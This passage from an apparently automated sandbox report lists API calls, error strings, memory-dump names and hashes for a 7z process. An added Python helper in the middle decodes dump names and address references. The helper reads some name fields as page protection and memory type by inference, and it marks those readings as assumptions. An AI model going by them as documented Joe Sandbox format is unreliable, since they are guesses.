• free.MSVCRT ref: 0020FC43
  • Part of subcall function 001D2130: malloc.MSVCRT ref: 001D2134
  • Part of subcall function 001D2130: _CxxThrowException.MSVCRT ref: 001D214F
  • Part of subcall function 0020F820: _CxxThrowException.MSVCRT ref: 0020F88D
• free.MSVCRT ref: 00210031
  • Part of subcall function 0020F8B8: memmove.MSVCRT ref: 0020F91E
  • Part of subcall function 0020F8B8: free.MSVCRT ref: 0020F926
  • Part of subcall function 0020F93C: memmove.MSVCRT ref: 0020F992
  • Part of subcall function 0020F93C: free.MSVCRT ref: 0020F99A
• free.MSVCRT ref: 002100EA
• free.MSVCRT ref: 002100F2
• free.MSVCRT ref: 00210101
• free.MSVCRT ref: 0021010A
• free.MSVCRT ref: 00210113
• free.MSVCRT ref: 00210121
• _CxxThrowException.MSVCRT ref: 00210184
Strings
• Internal file name collision (file on disk, file in archive):, xrefs: 0021015D
• Duplicate filename in archive:, xrefs: 00210149
• Duplicate filename on disk:, xrefs: 0020FCB4
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free$ExceptionThrow$memmove$mallocmemset
                                                                                                                                                                                                                                • String ID: Duplicate filename in archive:$Duplicate filename on disk:$Internal file name collision (file on disk, file in archive):
                                                                                                                                                                                                                                • API String ID: 3338823681-819937569
                                                                                                                                                                                                                                • Opcode ID: 05e571fda14d9d8926fc305dd0170e713781fc1b859d5d94d2c1757528fd9615
                                                                                                                                                                                                                                • Instruction ID: 8016895cf264cb59a6c5947cd4043450ed88508840d8c9ddae35aa7f6cebf50f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 05e571fda14d9d8926fc305dd0170e713781fc1b859d5d94d2c1757528fd9615
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CF129E7322878587C760DF19E58065EB7A1F389B90F504626EF9A47F99CB78D8A1CF00
Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1eb9012123f2ce8eb073f9b3624da2f3a3289b8457f20c18abc7480cb7118cc2
• Instruction ID: c3bee6eb45527431f4d63802df7538a5174e8b6a25b847999cfb8bc682e207e8
• Opcode Fuzzy Hash: 1eb9012123f2ce8eb073f9b3624da2f3a3289b8457f20c18abc7480cb7118cc2
• Instruction Fuzzy Hash: 99024632209EC186DA24DF66E4903AFB361FBD5B84F548126DB8E57B69DF39C845CB00
APIs
• DeviceIoControl.KERNEL32 ref: 001D8F7A
• DeviceIoControl.KERNEL32 ref: 001D905E
• DeviceIoControl.KERNEL32 ref: 001D90B5
• DeviceIoControl.KERNEL32 ref: 001D90F6
  • Part of subcall function 001DABB0: GetModuleHandleW.KERNEL32 ref: 001DABD1
  • Part of subcall function 001DABB0: GetProcAddress.KERNEL32 ref: 001DABE1
  • Part of subcall function 001DABB0: GetDiskFreeSpaceW.KERNEL32 ref: 001DAC32
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
Similarity
• API ID: ControlDevice$AddressDiskFreeHandleModuleProcSpace
• String ID: ($:
• API String ID: 4250411929-4277925470
• Opcode ID: 5b9f9703c519a548ceef949604e44196ebe8030fab0dc2f4f3b95e46287e534a
• Instruction ID: 23fd458b1f1d2704848bea5f4cb2fc99f10ede4124164391717988e375f80ec8
• Opcode Fuzzy Hash: 5b9f9703c519a548ceef949604e44196ebe8030fab0dc2f4f3b95e46287e534a
• Instruction Fuzzy Hash: 6351BD33608BC196CB30DF20F05079EB765F388764F548526EB9A47B58EB38C498CB40
APIs
Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
Similarity
• API ID: free$DriveLogicalStrings
• String ID:
• API String ID: 837055893-0
• Opcode ID: 3de173a54933036e0db587b8e1d0ec2bc758cc62df0222796deffbdb40624916
• Instruction ID: 5187df8b829c5db79b1990295678a09cb9e9f440e60a0de5fe71e5ae50c8133f
• Opcode Fuzzy Hash: 3de173a54933036e0db587b8e1d0ec2bc758cc62df0222796deffbdb40624916
• Instruction Fuzzy Hash: A031C423701B4155DA34EF26E96536A6361BB95BE8F8C8236DEAE47384DF38C946C310
APIs
• free.MSVCRT ref: 001D96D1
• GetFileInformationByHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,FFFFFFFF,00000001,00000000), ref: 001D9723
• DeviceIoControl.KERNEL32 ref: 001D976C
• free.MSVCRT ref: 001D9779
• free.MSVCRT ref: 001D9796
• memmove.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,FFFFFFFF,00000001,00000000), ref: 001D97C4
• free.MSVCRT ref: 001D97CD
Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
Similarity
• API ID: free$ControlDeviceFileHandleInformationmemmove
• String ID:
• API String ID: 2572579059-0
• Opcode ID: 81d8e5875d3dc795eb3d600148a840ab749245db3ba8f1a9a9afcbd51cdf2eb3
• Instruction ID: fb1069725854d7f4c0eaa56699e66154798d649f9d7c5e9f56c6ec006006b0dc
• Opcode Fuzzy Hash: 81d8e5875d3dc795eb3d600148a840ab749245db3ba8f1a9a9afcbd51cdf2eb3
• Instruction Fuzzy Hash: 56317332215A40CAC6309F16F95076AB764E7A6BE0F588222EBFD47B95DF3DC4918B00
APIs
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
Similarity
• API ID: Version$AddressHandleModuleProc
• String ID: SetDefaultDllDirectories$kernel32.dll
• API String ID: 2268189529-2102062458
• Opcode ID: 7a4e38354ab5005c4356f78164d2e6d32f5e0198e07bcfd6bf58e12f2388e286
• Instruction ID: 311efc73a52d466afbd70ce771192980f859a43556501eb89350ba3b44df3b8f
• Opcode Fuzzy Hash: 7a4e38354ab5005c4356f78164d2e6d32f5e0198e07bcfd6bf58e12f2388e286
• Instruction Fuzzy Hash: 95F05834218A42C2EF70DF50F8483E923A0FBA8709F850225C65E012B4EF7CC68CCB40
APIs
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
Similarity
                                                                                                                                                                                                                                • API ID: AddressDiskFreeHandleModuleProcSpace
                                                                                                                                                                                                                                • String ID: GetDiskFreeSpaceExW$kernel32.dll
                                                                                                                                                                                                                                • API String ID: 1197914913-1127948838
                                                                                                                                                                                                                                • Opcode ID: 91232d8e4c27da98ed619dc657d8975082bad2379c6f63f0bea740be7d830b66
                                                                                                                                                                                                                                • Instruction ID: 7f3dc366e1f9f9a0c426f6cc77a9b30cd55ff6ed40c454f364b4ee0e1107ad55
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 91232d8e4c27da98ed619dc657d8975082bad2379c6f63f0bea740be7d830b66
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B711643231AB4696DA50CF55F484B9AB364F7A4B80F449022EB9E03728EF38C559CB00
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • FileTimeToLocalFileTime.KERNEL32 ref: 001DB12A
                                                                                                                                                                                                                                • FileTimeToSystemTime.KERNEL32 ref: 001DB13E
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Time$File$LocalSystem
                                                                                                                                                                                                                                • String ID: gfff
                                                                                                                                                                                                                                • API String ID: 1748579591-1553575800
                                                                                                                                                                                                                                • Opcode ID: e09e1fa2f5dca829b3cb60a828e392fca3363189765d43a1e7a71e091b5d5d10
                                                                                                                                                                                                                                • Instruction ID: df8a8ad1ea774c17732788aba794100aae41e7eb98cc1b5566abc30e2f6f747c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e09e1fa2f5dca829b3cb60a828e392fca3363189765d43a1e7a71e091b5d5d10
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 22519A93B082C08BD719CB3DD846BCDBFC1E3A5758F08822ADB5687785E66DC50AC721
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 001DB5B8: GetCurrentProcess.KERNEL32 ref: 001DB5C2
                                                                                                                                                                                                                                • GetSystemInfo.KERNEL32 ref: 001DB624
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CurrentInfoProcessSystem
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1098911721-0
                                                                                                                                                                                                                                • Opcode ID: 3fe78990de1b082a0b60084bcba32a5828cb8e3291c47789f548cb5e73abf302
                                                                                                                                                                                                                                • Instruction ID: 2fb6c6dc13994bfbd2633515a1bdfb6ee60ae17924a0d4416b062aa2d5b433f2
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3fe78990de1b082a0b60084bcba32a5828cb8e3291c47789f548cb5e73abf302
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 12E01266628494C3CB70DB18E5C2769A361F7A4B85FD15612E68B82F14DF2DC654CF00
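The identifiers in the entries above are dense but decodable: the `.sdmp` names under Memory Dump Source carry the PID, analysis phase and base address of each dumped region, the IDA-plugin snapshot name repeats the PID, phase and image offset in a different radix, and every `ref:` address is an absolute address inside the dumped image that becomes an RVA once the `Offset` is subtracted. The following helper is an added example for this page, not Joe Sandbox code. PID, phase and base address are confirmed by the snapshot name `hcaresult_11_2_1d0000_7z.jbxd`; the reading of the fifth and seventh dotted fields as winnt.h page protection and MEM_* type is an inference from the values in this report (every dump here fits) and is marked as an assumption in the code. The sample lines are copied from the FileTimeToSystemTime and GetSystemInfo entries above.

```python
"""Decode Joe Sandbox memory-dump names, snapshot names and API references.

Added example for this page; not Joe Sandbox code.  Where a field meaning is
not documented it is kept verbatim or marked ASSUMPTION."""
import re
from dataclasses import dataclass
from typing import Optional

# winnt.h page-protection constants.  ASSUMPTION: the fifth dotted field of a
# .sdmp name is the region's protection; in this report 0x20 sits on the code
# section, 0x02 on headers/.rdata and 0x04 on the writable section.
PAGE_PROTECTION = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
# winnt.h region types.  ASSUMPTION: the seventh field is the MEM_* type;
# 0x01000000 (MEM_IMAGE) agrees with "based on PE: true".
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

HEX = "[0-9A-Fa-f]"
SDMP_RE = re.compile(
    rf"^(?P<pid>{HEX}{{8}})\.(?P<phase>{HEX}{{8}})\.(?P<dump_id>\d+)\.(?P<base>{HEX}{{16}})\."
    rf"(?P<protect>{HEX}{{8}})\.(?P<field6>{HEX}{{8}})\.(?P<mem_type>{HEX}{{8}})\.(?P<tag>{HEX}{{8}})\.sdmp$")
SNAPSHOT_RE = re.compile(rf"^hcaresult_(?P<pid>\d+)_(?P<phase>\d+)_(?P<base>{HEX}+)_.*\.jbxd$")
API_REF_RE = re.compile(
    rf"^(?:Part of subcall function (?P<sub>{HEX}+): )?(?P<api>\w+)\.(?P<module>\w+) ref: (?P<ref>{HEX}+)$")
SOURCE_RE = re.compile(rf"Source File:\s*(\S+\.sdmp),\s*Offset:\s*({HEX}+),\s*based on PE:\s*(true|false)")


@dataclass(frozen=True)
class DumpRegion:
    pid: int          # stored in hex in the name, decimal in the snapshot name
    phase: int        # analysis phase; matched against the snapshot name
    dump_id: str      # opaque identifier, kept verbatim
    base: int         # region start address in the analysed process
    protection: str   # see ASSUMPTION on PAGE_PROTECTION
    field6: str       # meaning not documented here; kept verbatim
    mem_type: str     # see ASSUMPTION on MEM_TYPE
    tag: str          # last field; meaning not documented here, kept verbatim


def parse_sdmp(name: str) -> DumpRegion:
    """Split one .sdmp file name into its dotted fields."""
    m = SDMP_RE.match(name.strip())
    if not m:
        raise ValueError(f"not a .sdmp dump name: {name!r}")
    prot, mtype = int(m["protect"], 16), int(m["mem_type"], 16)
    return DumpRegion(int(m["pid"], 16), int(m["phase"], 16), m["dump_id"], int(m["base"], 16),
                      PAGE_PROTECTION.get(prot, f"0x{prot:08x}"), m["field6"],
                      MEM_TYPE.get(mtype, f"0x{mtype:08x}"), m["tag"])


def parse_source_line(line: str) -> tuple[DumpRegion, int, bool]:
    """Parse 'Source File: <sdmp>, Offset: <hex>, based on PE: <bool>'."""
    m = SOURCE_RE.search(line)
    if not m:
        raise ValueError(f"not a Source File line: {line!r}")
    return parse_sdmp(m.group(1)), int(m.group(2), 16), m.group(3) == "true"


def snapshot_matches(snapshot: str, region: DumpRegion, image_offset: int) -> bool:
    """Cross-check the IDA snapshot name (decimal PID/phase, hex offset) against the dump."""
    m = SNAPSHOT_RE.match(snapshot.strip())
    return bool(m) and int(m["pid"]) == region.pid and int(m["phase"]) == region.phase \
        and int(m["base"], 16) == image_offset


def parse_api_ref(line: str) -> tuple[str, str, int, Optional[int]]:
    """Parse an 'APIs' bullet into (api, module, address, enclosing subcall or None)."""
    m = API_REF_RE.match(line.strip().lstrip("• ").strip())
    if not m:
        raise ValueError(f"not an API reference: {line!r}")
    return m["api"], m["module"], int(m["ref"], 16), int(m["sub"], 16) if m["sub"] else None


def rva(address: int, image_offset: int) -> int:
    """Absolute in-dump address -> RVA, so a ref can be found in the on-disk PE."""
    if address < image_offset:
        raise ValueError("address lies below the image offset")
    return address - image_offset


def decode_entry(lines: list[str]) -> dict:
    """Summarise one disassembly entry: regions, API refs as RVAs, snapshot consistency."""
    out: dict = {"apis": [], "associated": [], "source": None, "offset": None, "snapshot_ok": None}
    for raw in lines:
        line = raw.strip().lstrip("• ").strip()
        if line.startswith("Source File:"):
            out["source"], out["offset"], out["is_pe"] = parse_source_line(line)
        elif line.startswith("Associated:"):
            out["associated"].append(parse_sdmp(line.split(":", 1)[1]))
        elif line.startswith("Snapshot File:"):
            out["snapshot"] = line.split(":", 1)[1].strip()
        elif " ref: " in line:
            out["apis"].append(parse_api_ref(line))
    if out["source"] is not None:
        out["rvas"] = {api: rva(addr, out["offset"]) for api, _m, addr, _s in out["apis"]}
        if "snapshot" in out:
            out["snapshot_ok"] = snapshot_matches(out["snapshot"], out["source"], out["offset"])
    return out


# Sample input: lines copied from the entries above, indentation removed.
ENTRY = [
    "• FileTimeToLocalFileTime.KERNEL32 ref: 001DB12A",
    "• FileTimeToSystemTime.KERNEL32 ref: 001DB13E",
    "  • Part of subcall function 001DB5B8: GetCurrentProcess.KERNEL32 ref: 001DB5C2",
    "• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true",
    "• Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp",
    "• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd",
]

if __name__ == "__main__":
    d = decode_entry(ENTRY)
    print(d["source"], hex(d["offset"]), d["snapshot_ok"])
    for api, r in d["rvas"].items():
        print(f"{api:<28} RVA 0x{r:x}")
```

With the regions decoded this way, the code section of PID 11 is the `PAGE_EXECUTE_READ` dump at `0x1D1000` and the two time-conversion calls sit at RVAs `0xB12A` and `0xB13E`, which is where to look in the unpacked PE when cross-referencing the opcode and fuzzy hashes listed for this function.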
Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ee90a0e28cdf5ca319eb7aa323224805b652061d1b8a18153c9d68adb395663c
• Instruction ID: 34afeae6880bda907862fecc5a575742f80bca13212b8b6d580c827bd778b7ad
• Opcode Fuzzy Hash: ee90a0e28cdf5ca319eb7aa323224805b652061d1b8a18153c9d68adb395663c
• Instruction Fuzzy Hash: 09C001FA2197408B874A8F2EA850818BBA0F788B907868029AA0CD3300E2358444CF24
APIs
Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
Similarity
• API ID: free
• String ID:
• API String ID: 1294909896-0
• Opcode ID: 9cbdc30e6d0b5ea00b42a6c34bff6f946b52da21b37e4cfe8bd3163259cd7e86
• Instruction ID: b6924ba1278b0a6c7f0a45586ae67baa5c656950e1b2f4a4407fdefc8a4368bd
• Opcode Fuzzy Hash: 9cbdc30e6d0b5ea00b42a6c34bff6f946b52da21b37e4cfe8bd3163259cd7e86
• Instruction Fuzzy Hash: A3D1F12225958491CA20FF75E49166FA730F7E2780F549153FBAE93B2ACF38D846CB14
APIs
Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
Similarity
• API ID: free
• String ID:
• API String ID: 1294909896-0
• Opcode ID: 28ab6cdc9f263cf9404c085a8059b8072311b560ecc5f73d0aa5210d99d2189d
• Instruction ID: e62cc36087298c40d2019d3a959f795923b7ed37948e24f4b35b6ad83a2cdca8
• Opcode Fuzzy Hash: 28ab6cdc9f263cf9404c085a8059b8072311b560ecc5f73d0aa5210d99d2189d
• Instruction Fuzzy Hash: 4E913A22215B8486CB24EF36D064A6E6760F7EBF85F0AA463DB5E53711CF38D44AC714
APIs
Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
Similarity
• API ID: free$ExceptionThrowmallocmemmove
• String ID:
• API String ID: 3352498445-0
• Opcode ID: 060a242fe419d18ace11e0b1f05433c8320572bf80c973ccad8851887f661016
• Instruction ID: 10293a9953202a41f41496d2b89d5d62ae59477ff9b1d2b3358e9cfbf9ba6bfa
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 060a242fe419d18ace11e0b1f05433c8320572bf80c973ccad8851887f661016
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A7E1B23370869486CB30EE16E4811AEA760F3A6BD0F494126EFAD57B19CF78D886C750
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free$memmove$ExceptionThrow
                                                                                                                                                                                                                                • String ID: incorrect update switch command$pqrxyzw
                                                                                                                                                                                                                                • API String ID: 3957182552-3922825594
                                                                                                                                                                                                                                • Opcode ID: 7c7c3e7fd9314440e1a1777af8ec9796aa83228940c07231adba96d4221eb7b0
                                                                                                                                                                                                                                • Instruction ID: 6defc57a7e31e74ff4d5f97028a3179a7870430e491aa7820bf0c66f8956f637
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7c7c3e7fd9314440e1a1777af8ec9796aa83228940c07231adba96d4221eb7b0
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5A81A3226149C492CB21EF16D8907AE7330F7E9B84F458123EB9E47769CF78C986C750
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free$memmove$wcscmp$ExceptionThrow
                                                                                                                                                                                                                                • String ID: Empty file path
                                                                                                                                                                                                                                • API String ID: 462375450-1562447899
                                                                                                                                                                                                                                • Opcode ID: ab664bf3e0e52273a7b2c93043638589f708cf9af184803b1dcc7a9fe34b6b52
                                                                                                                                                                                                                                • Instruction ID: b506dc983897a2b1855f0f3c065fb7c26f7cb10878e7230488cc68f3e5bba06b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ab664bf3e0e52273a7b2c93043638589f708cf9af184803b1dcc7a9fe34b6b52
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 98D19233214AC086CB20EF25E4903AEB762F7A5794F544127EFAA57B69DF38C945CB40
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: \$\\?\$\\?\UNC\
                                                                                                                                                                                                                                • API String ID: 0-1962706685
